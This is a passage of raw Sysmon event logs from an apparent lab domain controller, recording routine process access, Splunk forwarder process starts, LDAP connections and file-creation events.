l.dll+51781 10341000x800000000000000019886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-1D03-00000000CF01}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.062{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A181-60D3-1D03-00000000CF01}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.063{4DB9351A-A181-60D3-1D03-00000000CF01}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.031{4DB9351A-A180-60D3-1C03-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CROYBTCQJO\System.Runtime.WindowsRuntime.ni.dll.auxMD5=F834E5C9A7866887362FB9213F18DC0D,SHA256=A625FB887C34995095C4FA4BA4267799C8846641366006B98D993563ADFC8BAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.015{4DB9351A-A180-60D3-1C03-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CROYBTCQJO\System.Runtime.WindowsRuntime.ni.dllMD5=27EF880C773B45568FC308A312FED2EC,SHA256=F803E4273F8CC85B0C84F0B1EB86568E7210DA1A1E8EF05D1F019E833250E519,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.999{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D204971838DB124BF068481FA0B2AEBA,SHA256=6C0D784C9D87BEA1DE14F57971D2AF5479372F3F58128C8B13012EB8B0CC411A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:56.999{4DB9351A-A180-60D3-1C03-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18b0-0\System.Runtime.WindowsRuntime.dll2021-06-23 21:02:56.999 10341000x800000000000000019926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.577{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5FECFFAB70B071FF7BE4FFF5135614E,SHA256=EC7428885642386F98793541CB9BA9735C8C1B868985B3D4031F06D18F8FA31F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.268{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61402-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.268{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61402-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.261{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61401-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.261{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61401-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.242{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61400-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000019917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.242{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61400-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 10341000x800000000000000019916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.359{4DB9351A-A181-60D3-2203-00000000CF01}70643740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.124{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.109{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:57.970{4DB9351A-A181-60D3-2203-00000000CF01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:58.062{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A8B9BECB2EB242D6793BA2C414012CE,SHA256=2F2761AA2D431C8112BD37AF2D4BB89FA49F8C005A7FEFE95C1AADA4685EB2F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A183-60D3-2403-00000000CF01}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:59.827{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 